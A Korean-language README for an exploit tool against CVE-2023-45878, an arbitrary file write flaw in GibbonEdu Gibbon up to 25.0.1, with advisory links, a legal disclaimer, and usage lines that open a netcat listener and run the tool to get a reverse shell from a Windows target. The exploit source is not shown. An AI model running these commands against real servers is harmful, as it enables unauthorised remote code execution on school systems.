
CVE-2023-45878 쉬운 익스플로잇 | 리버스 셸
GibbonEdu Gibbon 버전 25.0.1 이하에서 임의 파일 쓰기(Arbitrary File Write)가 가능합니다.
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
이 익스플로잇은 교육 및 연구 목적으로만 제공됩니다. 명시적인 허가 없이 이 코드를 시스템에 대해 무단 사용하는 것은 불법이며, 다양한 관할권의 사이버 범죄 법률을 위반할 수 있습니다. 본인은 이 익스플로잇으로 인한 오용 또는 손해에 대해 어떠한 책임도 지지 않습니다.
이 코드를 실행하기 전에 모든 관련 법률 및 윤리 지침을 준수하는 것은 사용자의 책임입니다. 이 익스플로잇을 악의적인 활동에 사용하지 마십시오.
이 익스플로잇은 Windows Server에서만 작동합니다. 취약한 Gibbon 버전이 Linux 서버에서 실행되는 경우, 그에 맞게 익스플로잇을 수정해야 합니다.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> 또는 ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>